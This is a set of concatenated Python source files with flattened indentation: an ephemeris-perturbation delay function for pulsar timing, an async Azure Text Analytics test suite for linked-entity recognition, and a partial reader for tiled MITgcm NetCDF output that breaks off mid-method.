planetssb,
pos_t,
frame_drift_rate=0,
d_jupiter_mass=0,
d_saturn_mass=0,
d_uranus_mass=0,
d_neptune_mass=0,
jup_orb_elements=np.zeros(6, "d"),
sat_orb_elements=np.zeros(6, "d"),
times=None,
jup_orbit=None,
sat_orbit=None,
equatorial=True,
):
# convert toas to MJD
mjd = toas / 86400
# grab planet-to-SSB vectors
earth = planetssb[:, 2, :3]
jupiter = planetssb[:, 4, :3]
saturn = planetssb[:, 5, :3]
uranus = planetssb[:, 6, :3]
neptune = planetssb[:, 7, :3]
# do frame rotation
earth = ss_framerotate(mjd, earth, 0.0, 0.0, 0.0, frame_drift_rate, offset=None, equatorial=equatorial)
# mass perturbations
for planet, dm in [
(jupiter, d_jupiter_mass),
(saturn, d_saturn_mass),
(uranus, d_uranus_mass),
(neptune, d_neptune_mass),
]:
earth += dmass(planet, dm)
# Jupiter orbit perturbation
if np.any(jup_orb_elements):
tmp = 0.0009547918983127075 * np.einsum("i,ijk->jk", jup_orb_elements, jup_orbit)
earth += np.array([np.interp(mjd, times, tmp[:, aa]) for aa in range(3)]).T
# Saturn orbit perturbation
if np.any(sat_orb_elements):
tmp = 0.00028588567008942334 * np.einsum("i,ijk->jk", sat_orb_elements, sat_orbit)
earth += np.array([np.interp(mjd, times, tmp[:, aa]) for aa in range(3)]).T
# construct the true geocenter to barycenter roemer
tmp_roemer = np.einsum("ij,ij->i", planetssb[:, 2, :3], pos_t)
# create the delay
delay = tmp_roemer - np.einsum("ij,ij->i", earth, pos_t)
return delay
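# --- Illustrative sketch (not part of the library) ---------------------------
# How the two pieces above fit together, assuming `psr` is an enterprise
# Pulsar object exposing toas, planetssb and pos_t (names are illustrative),
# and that the @function decorator evaluates immediately for concrete inputs:
#
#     F, sigmas = createfourierdesignmatrix_physicalephem(
#         psr.toas, psr.planetssb, psr.pos_t)
#     phi = physicalephem_spectrum(sigmas)  # prior variances, one per column of F
#     # ephemeris-perturbation delays are then modeled as F @ c, with
#     # Gaussian coefficients c whose variances are phi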
| jellis18/enterprise | enterprise/signals/utils.py | Python | mit | 29,066 |
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import os
import pytest
import platform
import functools
from azure.core.exceptions import HttpResponseError, ClientAuthenticationError
from azure.core.credentials import AzureKeyCredential
from azure.ai.textanalytics.aio import TextAnalyticsClient
from azure.ai.textanalytics import (
VERSION,
DetectLanguageInput,
TextDocumentInput,
TextAnalyticsApiVersion,
)
from testcase import TextAnalyticsPreparer
from testcase import TextAnalyticsClientPreparer as _TextAnalyticsClientPreparer
from devtools_testutils.aio import recorded_by_proxy_async
from testcase import TextAnalyticsTest
# pre-apply the client_cls positional argument so it needn't be explicitly passed below
TextAnalyticsClientPreparer = functools.partial(_TextAnalyticsClientPreparer, TextAnalyticsClient)
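# i.e. TextAnalyticsClientPreparer(**kw) now behaves like
# _TextAnalyticsClientPreparer(TextAnalyticsClient, **kw)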
class TestRecognizeLinkedEntities(TextAnalyticsTest):
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_no_single_input(self, client):
with pytest.raises(TypeError):
response = await client.recognize_linked_entities("hello world")
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_all_successful_passing_dict(self, client):
docs = [{"id": "1", "language": "en", "text": "Microsoft was founded by Bill Gates and Paul Allen"},
{"id": "2", "language": "es", "text": "Microsoft fue fundado por Bill Gates y Paul Allen"}]
response = await client.recognize_linked_entities(docs, show_stats=True)
for doc in response:
assert len(doc.entities) == 3
assert doc.id is not None
assert doc.statistics is not None
for entity in doc.entities:
assert entity.name is not None
assert entity.language is not None
assert entity.data_source_entity_id is not None
assert entity.url is not None
assert entity.data_source is not None
assert entity.matches is not None
for match in entity.matches:
assert match.offset is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_all_successful_passing_text_document_input(self, client):
docs = [
TextDocumentInput(id="1", text="Microsoft was founded by Bill Gates and Paul Allen"),
TextDocumentInput(id="2", text="Microsoft fue fundado por Bill Gates y Paul Allen")
]
response = await client.recognize_linked_entities(docs)
for doc in response:
assert len(doc.entities) == 3
for entity in doc.entities:
assert entity.name is not None
assert entity.language is not None
assert entity.data_source_entity_id is not None
assert entity.url is not None
assert entity.data_source is not None
assert entity.matches is not None
for match in entity.matches:
assert match.offset is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_passing_only_string(self, client):
docs = [
"Microsoft was founded by Bill Gates and Paul Allen",
"Microsoft fue fundado por Bill Gates y Paul Allen",
""
]
response = await client.recognize_linked_entities(docs)
assert len(response[0].entities) == 3
assert len(response[1].entities) == 3
assert response[2].is_error
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_input_with_some_errors(self, client):
docs = [{"id": "1", "text": ""},
{"id": "2", "language": "es", "text": "Microsoft fue fundado por Bill Gates y Paul Allen"}]
response = await client.recognize_linked_entities(docs)
assert response[0].is_error
assert not response[1].is_error
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_input_with_all_errors(self, client):
docs = [{"id": "1", "text": ""},
{"id": "2", "language": "Spanish", "text": "Microsoft fue fundado por Bill Gates y Paul Allen"}]
response = await client.recognize_linked_entities(docs)
assert response[0].is_error
assert response[1].is_error
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_too_many_documents(self, client):
docs = ["One", "Two", "Three", "Four", "Five", "Six"]
with pytest.raises(HttpResponseError) as excinfo:
await client.recognize_linked_entities(docs)
assert excinfo.value.status_code == 400
assert excinfo.value.error.code == "InvalidDocumentBatch"
assert "Batch request contains too many records" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_output_same_order_as_input(self, client):
docs = [
TextDocumentInput(id="1", text="one"),
TextDocumentInput(id="2", text="two"),
TextDocumentInput(id="3", text="three"),
TextDocumentInput(id="4", text="four"),
TextDocumentInput(id="5", text="five")
]
response = await client.recognize_linked_entities(docs)
for idx, doc in enumerate(response):
assert str(idx + 1) == doc.id
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"textanalytics_test_api_key": ""})
@recorded_by_proxy_async
async def test_empty_credential_class(self, client):
with pytest.raises(ClientAuthenticationError):
response = await client.recognize_linked_entities(
["This is written in English."]
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"textanalytics_test_api_key": "xxxxxxxxxxxx"})
@recorded_by_proxy_async
async def test_bad_credentials(self, client):
with pytest.raises(ClientAuthenticationError):
response = await client.recognize_linked_entities(
["This is written in English."]
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_bad_document_input(self, client):
docs = "This is the wrong type"
with pytest.raises(TypeError):
response = await client.recognize_linked_entities(docs)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_mixing_inputs(self, client):
docs = [
{"id": "1", "text": "Microsoft was founded by Bill Gates and Paul Allen."},
TextDocumentInput(id="2", text="I did not like the hotel we stayed at. It was too expensive."),
"You cannot mix string input with the above inputs"
]
with pytest.raises(TypeError):
response = await client.recognize_linked_entities(docs)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_out_of_order_ids(self, client):
docs = [{"id": "56", "text": ":)"},
{"id": "0", "text": ":("},
{"id": "22", "text": ""},
{"id": "19", "text": ":P"},
{"id": "1", "text": ":D"}]
response = await client.recognize_linked_entities(docs)
in_order = ["56", "0", "22", "19", "1"]
for idx, resp in enumerate(response):
assert resp.id == in_order[idx]
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_show_stats_and_model_version(self, client):
def callback(response):
assert response is not None
assert response.model_version
assert response.raw_response is not None
assert response.statistics.document_count == 5
assert response.statistics.transaction_count == 4
assert response.statistics.valid_document_count == 4
assert response.statistics.erroneous_document_count == 1
docs = [{"id": "56", "text": ":)"},
{"id": "0", "text": ":("},
{"id": "22", "text": ""},
{"id": "19", "text": ":P"},
{"id": "1", "text": ":D"}]
response = await client.recognize_linked_entities(
docs,
show_stats=True,
model_version="latest",
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_batch_size_over_limit(self, client):
docs = ["hello world"] * 1050
with pytest.raises(HttpResponseError):
response = await client.recognize_linked_entities(docs)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"fr\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [
"This was the best day of my life.",
"I did not like the hotel we stayed at. It was too expensive.",
"The restaurant was not as good as I hoped."
]
response = await client.recognize_linked_entities(docs, language="fr", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_dont_use_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [
"This was the best day of my life.",
"I did not like the hotel we stayed at. It was too expensive.",
"The restaurant was not as good as I hoped."
]
response = await client.recognize_linked_entities(docs, language="", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_per_item_dont_use_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"\""
language = resp.http_request.body.count(language_str)
assert language == 2
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 1
docs = [{"id": "1", "language": "", "text": "I will go to the park."},
{"id": "2", "language": "", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint_and_obj_input(self, client):
def callback(resp):
language_str = "\"language\": \"de\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [
TextDocumentInput(id="1", text="I should take my cat to the veterinarian."),
TextDocumentInput(id="4", text="Este es un document escrito en Español."),
TextDocumentInput(id="3", text="猫は幸せ"),
]
response = await client.recognize_linked_entities(docs, language="de", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint_and_obj_per_item_hints(self, client):
def callback(resp):
language_str = "\"language\": \"es\""
language = resp.http_request.body.count(language_str)
assert language == 2
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 1
docs = [
TextDocumentInput(id="1", text="I should take my cat to the veterinarian.", language="es"),
TextDocumentInput(id="2", text="Este es un document escrito en Español.", language="es"),
TextDocumentInput(id="3", text="猫は幸せ"),
]
response = await client.recognize_linked_entities(docs, language="en", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_whole_batch_language_hint_and_dict_per_item_hints(self, client):
def callback(resp):
language_str = "\"language\": \"es\""
language = resp.http_request.body.count(language_str)
assert language == 2
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 1
docs = [{"id": "1", "language": "es", "text": "I will go to the park."},
{"id": "2", "language": "es", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, language="en", raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"default_language": "es"})
@recorded_by_proxy_async
async def test_client_passed_default_language_hint(self, client):
def callback(resp):
language_str = "\"language\": \"es\""
language = resp.http_request.body.count(language_str)
assert language == 3
def callback_2(resp):
language_str = "\"language\": \"en\""
language = resp.http_request.body.count(language_str)
assert language == 3
docs = [{"id": "1", "text": "I will go to the park."},
{"id": "2", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
response = await client.recognize_linked_entities(docs, language="en", raw_response_hook=callback_2)
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_invalid_language_hint_method(self, client):
response = await client.recognize_linked_entities(
["This should fail because we're passing in an invalid language hint"], language="notalanguage"
)
assert response[0].error.code == 'UnsupportedLanguageCode'
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_invalid_language_hint_docs(self, client):
response = await client.recognize_linked_entities(
[{"id": "1", "language": "notalanguage", "text": "This should fail because we're passing in an invalid language hint"}]
)
assert response[0].error.code == 'UnsupportedLanguageCode'
@TextAnalyticsPreparer()
@recorded_by_proxy_async
async def test_rotate_subscription_key(self, textanalytics_test_endpoint, textanalytics_test_api_key):
credential = AzureKeyCredential(textanalytics_test_api_key)
client = TextAnalyticsClient(textanalytics_test_endpoint, credential)
docs = [{"id": "1", "text": "I will go to the park."},
{"id": "2", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs)
assert response is not None
credential.update("xxx") # Make authentication fail
with pytest.raises(ClientAuthenticationError):
response = await client.recognize_linked_entities(docs)
credential.update(textanalytics_test_api_key) # Authenticate successfully again
response = await client.recognize_linked_entities(docs)
assert response is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_user_agent(self, client):
def callback(resp):
assert "azsdk-python-ai-textanalytics/{} Python/{} ({})".format(
VERSION, platform.python_version(), platform.platform()) in \
resp.http_request.headers["User-Agent"]
docs = [{"id": "1", "text": "I will go to the park."},
{"id": "2", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": "The restaurant had really good food."}]
response = await client.recognize_linked_entities(docs, raw_response_hook=callback)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_attribute_error_no_result_attribute(self, client):
docs = [{"id": "1", "text": ""}]
response = await client.recognize_linked_entities(docs)
# Attributes on DocumentError
assert response[0].is_error
assert response[0].id == "1"
assert response[0].error is not None
# Result attribute not on DocumentError, custom error message
try:
entities = response[0].entities
except AttributeError as custom_error:
assert custom_error.args[0] == \
'\'DocumentError\' object has no attribute \'entities\'. ' \
'The service was unable to process this document:\nDocument Id: 1\nError: ' \
'InvalidDocument - Document text is empty.\n'
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_attribute_error_nonexistent_attribute(self, client):
docs = [{"id": "1", "text": ""}]
response = await client.recognize_linked_entities(docs)
# Attribute not found on DocumentError or result obj, default behavior/message
try:
entities = response[0].attribute_not_on_result_or_error
except AttributeError as default_behavior:
assert default_behavior.args[0] == '\'DocumentError\' object has no attribute \'attribute_not_on_result_or_error\''
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_bad_model_version_error(self, client):
docs = [{"id": "1", "language": "english", "text": "I did not like the hotel we stayed at."}]
try:
result = await client.recognize_linked_entities(docs, model_version="bad")
except HttpResponseError as err:
assert err.error.code == "ModelVersionIncorrect"
assert err.error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_errors(self, client):
text = ""
for _ in range(5121):
text += "x"
docs = [{"id": "1", "text": ""},
{"id": "2", "language": "english", "text": "I did not like the hotel we stayed at."},
{"id": "3", "text": text}]
doc_errors = await client.recognize_linked_entities(docs)
assert doc_errors[0].error.code == "InvalidDocument"
assert doc_errors[0].error.message is not None
assert doc_errors[1].error.code == "UnsupportedLanguageCode"
assert doc_errors[1].error.message is not None
assert doc_errors[2].error.code == "InvalidDocument"
assert doc_errors[2].error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_document_warnings(self, client):
        # No warnings are currently returned for recognize_linked_entities; update this test when the service adds them
docs = [
{"id": "1", "text": "This won't actually create a warning :'("},
]
result = await client.recognize_linked_entities(docs)
for doc in result:
doc_warnings = doc.warnings
assert len(doc_warnings) == 0
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_not_passing_list_for_docs(self, client):
docs = {"id": "1", "text": "hello world"}
with pytest.raises(TypeError) as excinfo:
await client.recognize_linked_entities(docs)
assert "Input documents cannot be a dict" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_missing_input_records_error(self, client):
docs = []
with pytest.raises(ValueError) as excinfo:
await client.recognize_linked_entities(docs)
assert "Input documents can not be empty or None" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_passing_none_docs(self, client):
with pytest.raises(ValueError) as excinfo:
await client.recognize_linked_entities(None)
assert "Input documents can not be empty or None" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_duplicate_ids_error(self, client):
# Duplicate Ids
docs = [{"id": "1", "text": "hello world"},
{"id": "1", "text": "I did not like the hotel we stayed at."}]
try:
result = await client.recognize_linked_entities(docs)
except HttpResponseError as err:
assert err.error.code == "InvalidDocument"
assert err.error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_batch_size_over_limit_error(self, client):
# Batch size over limit
docs = ["hello world"] * 1001
try:
response = await client.recognize_linked_entities(docs)
except HttpResponseError as err:
assert err.error.code == "InvalidDocumentBatch"
assert err.error.message is not None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_language_kwarg_spanish(self, client):
def callback(response):
language_str = "\"language\": \"es\""
assert response.http_request.body.count(language_str) == 1
assert response.model_version is not None
assert response.statistics is not None
res = await client.recognize_linked_entities(
documents=["Bill Gates is the CEO of Microsoft."],
model_version="latest",
show_stats=True,
language="es",
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_pass_cls(self, client):
def callback(pipeline_response, deserialized, _):
return "cls result"
res = await client.recognize_linked_entities(
documents=["Test passing cls to endpoint"],
cls=callback
)
assert res == "cls result"
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_offset(self, client):
result = await client.recognize_linked_entities(["Microsoft was founded by Bill Gates and Paul Allen"])
entities = result[0].entities
# the entities are being returned in a non-sequential order by the service
microsoft_entity = [entity for entity in entities if entity.name == "Microsoft"][0]
bill_gates_entity = [entity for entity in entities if entity.name == "Bill Gates"][0]
paul_allen_entity = [entity for entity in entities if entity.name == "Paul Allen"][0]
assert microsoft_entity.matches[0].offset == 0
assert bill_gates_entity.matches[0].offset == 25
assert paul_allen_entity.matches[0].offset == 40
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"api_version": TextAnalyticsApiVersion.V3_0})
@recorded_by_proxy_async
async def test_no_offset_v3_linked_entity_match(self, client):
result = await client.recognize_linked_entities(["Microsoft was founded by Bill Gates and Paul Allen"])
entities = result[0].entities
assert entities[0].matches[0].offset is None
assert entities[1].matches[0].offset is None
assert entities[2].matches[0].offset is None
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"api_version": TextAnalyticsApiVersion.V3_0})
@recorded_by_proxy_async
async def test_string_index_type_not_fail_v3(self, client):
# make sure that the addition of the string_index_type kwarg for v3.1-preview doesn't
# cause v3.0 calls to fail
await client.recognize_linked_entities(["please don't fail"])
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_bing_id(self, client):
result = await client.recognize_linked_entities(["Microsoft was founded by Bill Gates and Paul Allen"])
for doc in result:
for entity in doc.entities:
assert entity.bing_entity_search_api_id # this checks if it's None and if it's empty
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"api_version": TextAnalyticsApiVersion.V3_0})
@recorded_by_proxy_async
async def test_string_index_type_explicit_fails_v3(self, client):
with pytest.raises(ValueError) as excinfo:
await client.recognize_linked_entities(["this should fail"], string_index_type="UnicodeCodePoint")
assert "'string_index_type' is only available for API version V3_1 and up" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_default_string_index_type_is_UnicodeCodePoint(self, client):
def callback(response):
assert response.http_request.query["stringIndexType"] == "UnicodeCodePoint"
res = await client.recognize_linked_entities(
documents=["Hello world"],
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_explicit_set_string_index_type(self, client):
def callback(response):
assert response.http_request.query["stringIndexType"] == "TextElements_v8"
res = await client.recognize_linked_entities(
documents=["Hello world"],
string_index_type="TextElements_v8",
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_disable_service_logs(self, client):
def callback(resp):
assert resp.http_request.query['loggingOptOut']
await client.recognize_linked_entities(
documents=["Test for logging disable"],
disable_service_logs=True,
raw_response_hook=callback,
)
| Azure/azure-sdk-for-python | sdk/textanalytics/azure-ai-textanalytics/tests/test_recognize_linked_entities_async.py | Python | mit | 28,006 |
import sys
import glob
import numpy as np
from .netcdf import netcdf_file
_exclude_global = ['close',
'createDimension',
'createVariable',
'dimensions',
'filename',
'flush',
'fp',
'mode',
'sync',
'use_mmap',
'variables',
'version_byte',
]
_exclude_var = ['assignValue',
'data',
'dimensions',
'getValue',
'isrec',
'itemsize',
'shape',
'typecode',
]
def getattributes(nc, exclude=[]):
# in order not to rely on implementation, provide fallback
try:
a = dict(nc._attributes)
except AttributeError:
a = dict((k, getattr(nc, k)) for k in dir(nc) if k[0] != '_' and k not in exclude)
return a
class MNC:
"""
A file object for MNC (tiled NetCDF) data.
Should behave mostly like scipy.io.netcdf.netcdf_file in 'r' mode.
Parameters
----------
fpatt :: glob pattern for tile files
layout :: which global layout to use:
'model' : use layout implied by Nx, Ny
'exch2' : use exch2 global layout
'faces' : variables are lists of exch2 faces
default is to use exch2 layout if present, model otherwise
Example:
nc = mnc_files('mnc_*/state.0000000000.t*.nc')
temp = nc.variables['Temp'][:]
    salt = nc.variables['S'][:]
nc.close()
temp and salt are now assembled (global) arrays of shape (Nt, Nr, Ny, Nx)
    where Nt is the number of iterations found in the file (in this case probably 1).
"""
# avoid problems with __del__
nc = []
def __init__(self, fpatt, layout=None, multitime=False):
fnames = glob.glob(fpatt)
# if multitime:
# iters = [ f[-18:-8] for f in fnames if f.endswith('.t001.nc') ]
# iters.sort()
# fnames_first = [ f for f in fnames if f[-18:-8] == iters[0] ]
# else:
# fnames_first = fnames
fnames.sort()
# open files
self.nc = [ netcdf_file(f,'r') for f in fnames ]
# global attributes
# get from first file, but remove/reset tile-specific ones
self._attributes = getattributes(self.nc[0], _exclude_global)
self._attributes['tile_number'] = 1
self._attributes['bi'] = 1
self._attributes['bj'] = 1
haveexch2 = False
for k in list(self._attributes):
if k.startswith('exch2_'):
del self._attributes[k]
haveexch2 = True
sNx = self.sNx
sNy = self.sNy
ntx = self.nSx*self.nPx
nty = self.nSy*self.nPy
if layout is None:
if haveexch2:
layout = 'exch2'
else:
layout = 'model'
self.layout = layout
# precompute indices
self._i0 = []
self._ie = []
self._j0 = []
self._je = []
self._fn = []
self._nf = 0
if layout == 'model':
self._nx = self.Nx
self._ny = self.Ny
for nc in self.nc:
tn = nc.tile_number
bj,bi = divmod(tn-1, ntx)
ie = sNx*(bi+1-ntx)
je = sNy*(bj+1-nty)
self._i0.append(sNx*bi)
self._j0.append(sNy*bj)
self._ie.append(ie or None)
self._je.append(je or None)
elif layout == 'exch2':
self._nx = 0
self._ny = 0
for nc in self.nc:
i0 = nc.exch2_txGlobalo - 1
j0 = nc.exch2_tyGlobalo - 1
ie = i0 + sNx
je = j0 + sNy
self._i0.append(i0)
self._j0.append(j0)
self._ie.append(ie)
self._je.append(je)
self._nx = max(self._nx, ie)
self._ny = max(self._ny, je)
# make ie, je relative to end (for non-tracer points)
for i in range(len(self._i0)):
ie = self._ie[i] - self._nx
je = self._je[i] - self._ny
self._ie[i] = ie or None
self._je[i] = je or None
elif layout == 'faces':
self._nx = {}
self._ny = {}
for nc in self.nc:
fn = nc.exch2_myFace
i0 = nc.exch2_tBasex
j0 = nc.exch2_tBasey
ie = i0 + sNx
je = j0 + sNy
self._fn.append(fn)
self._i0.append(i0)
self._j0.append(j0)
self._ie.append(ie)
self._je.append(je)
self._nx[fn] = max(self._nx.get(fn, 0), ie)
self._ny[fn] = max(self._ny.get(fn, 0), je)
# make ie, je relative to end (for non-tracer points)
for i in range(len(self._fn)):
fn = self._fn[i]
ie = self._ie[i] - self._nx[fn]
je = self._je[i] - self._ny[fn]
self._ie[i] = ie or None
self._je[i] = je or None
self._fns = sorted(self._nx.keys())
self._nf = len(self._fns)
for i in range(len(self._fn)):
self._fn[i] = self._fns.index(self._fn[i])
self._nx = np.array([self._nx[fn] for fn in self._fns])
self._ny = np.array([self._ny[fn] for fn in self._fns])
else:
raise ValueError('Unknown layout: {}'.format(layout))
# dimensions
self.dimensions = {}
for k,n in self.nc[0].dimensions.items():
# compute size of dimension in global array for X* and Y*
if k[0] == 'X':
n += self._nx - sNx
if k[0] == 'Y':
n += self._ny - sNy
self.dimensions[k] = n
# variables
var0 = self.nc[0].variables
# find size of record dimension first
if 'T' in self.dimensions and self.dimensions['T'] is None:
self.times = list(var0.get('T', [])[:])
self.iters = list(var0.get('iter', self.times)[:])
self.nrec = len(self.iters)
self.variables = dict((k, MNCVariable(self, k)) for k in var0)
def __getattr__(self, k):
try:
return self._attributes[k]
except KeyError:
raise AttributeError("'MNC' object has no attribute '" + k + "'")
def __dir__(self):
        return list(self.__dict__) + list(self._attributes)
def close(self):
"""Close tile files"""
for nc in self.nc:
nc.close()
__del__ = close
@property
def faces(self):
if self.layout == 'faces':
return self._fns
else:
return None
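# --- Illustrative sketch (not part of the module) ----------------------------
# Assembling exch2 faces with the 'faces' layout; the file pattern below is
# an assumption.
#
#     nc = mnc_files('mnc_*/state.0000000000.t*.nc', layout='faces')
#     T = nc.variables['Temp']
#     face0 = T.face(0)     # global array for the first exch2 face
#     faces = T[:]          # list with one array per face
#     nc.close()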
def calcstrides(slices, dims):
    """
    Normalize an indexing expression `slices` into per-dimension
    (start, stop, step) triples for dimensions of sizes `dims`.
    Returns (strides, shape, fullshape): `shape` drops dimensions that were
    indexed with a scalar, `fullshape` keeps them as length-1 dimensions.
    """
try:
slices[0]
except TypeError:
slices = (slices,)
if Ellipsis in slices:
cut = slices.index(Ellipsis)
slices = slices[:cut] + (len(dims)-len(slices)+1)*(slice(0,None,None),) + slices[cut+1:]
else:
slices = slices + (len(dims)-len(slices))*(slice(0,None,None),)
# return tuple( hasattr(s,'indices') and s.indices(dim) or s for s,dim in zip(slices,dims) )
strides = []
shape = []
fullshape = []
for s,dim in zip(slices,dims):
try:
stride = s.indices(dim)
except AttributeError:
stride = (s, s+1, 1)
n = 1
else:
# real slice, will make a dimension
start,stop,step = stride
n = (stop-start+step-1)//step
shape.append(n)
fullshape.append(n)
strides.append(stride)
return tuple(strides), tuple(shape), tuple(fullshape)
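# Worked example (illustrative): calcstrides(np.s_[..., 2], (5, 10, 20)) gives
#   strides   = ((0, 5, 1), (0, 10, 1), (2, 3, 1))
#   shape     = (5, 10)        # scalar indices dropped
#   fullshape = (5, 10, 1)     # scalar indices kept as length-1 dimensions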
class MNCVariable(object):
def __init__(self, mnc, name):
self._name = name
self.nc = mnc.nc
self.layout = mnc.layout
self._i0 = mnc._i0
self._ie = mnc._ie
self._j0 = mnc._j0
self._je = mnc._je
self._nf = mnc._nf
self._fn = mnc._fn
v0 = mnc.nc[0].variables[name]
self._attributes = getattributes(v0, _exclude_var)
self.itemsize = v0.data.itemsize
self.typecode = v0.typecode
self.dtype = np.dtype(self.typecode())
self.dimensions = v0.dimensions
self.shape = tuple( mnc.dimensions[d] for d in self.dimensions )
self.isrec = self.shape[0] is None
if self.isrec:
self.shape = (mnc.nrec,) + self.shape[1:]
# which dimensions are tiled
self._Xdim = None
self._Ydim = None
for i,d in enumerate(self.dimensions):
if d[0] == 'X': self._Xdim = i
if d[0] == 'Y': self._Ydim = i
def __getattr__(self, k):
try:
return self._attributes[k]
except KeyError:
raise AttributeError("'MNCVariable' object has no attribute '" + k + "'")
def __dir__(self):
        return list(self.__dict__) + list(self._attributes)
def __getitem__(self, ind):
if self.layout == 'faces':
return self._getfaces(ind)
if ind in [Ellipsis, slice(None)]:
# whole array
res = np.zeros(self.shape, self.typecode())
s = [slice(None) for d in self.shape]
for i,nc in enumerate(self.nc):
if self._Xdim is not None:
s[self._Xdim] = slice(self._i0[i], self._ie[i])
if self._Ydim is not None:
s[self._Ydim] = slice(self._j0[i], self._je[i])
res[s] = nc.variables[self._name][:]
return res
else:
# read only required data
strides,resshape,fullshape = calcstrides(ind, self.shape)
res = np.zeros(fullshape, self.dtype)
s = [slice(*stride) for stride in strides]
sres = [slice(None) for d in fullshape]
if self._Xdim is not None: I0,Ie,Is = strides[self._Xdim]
if self._Ydim is not None: J0,Je,Js = strides[self._Ydim]
for i,nc in enumerate(self.nc):
if self._Xdim is not None:
i0 = self._i0[i]
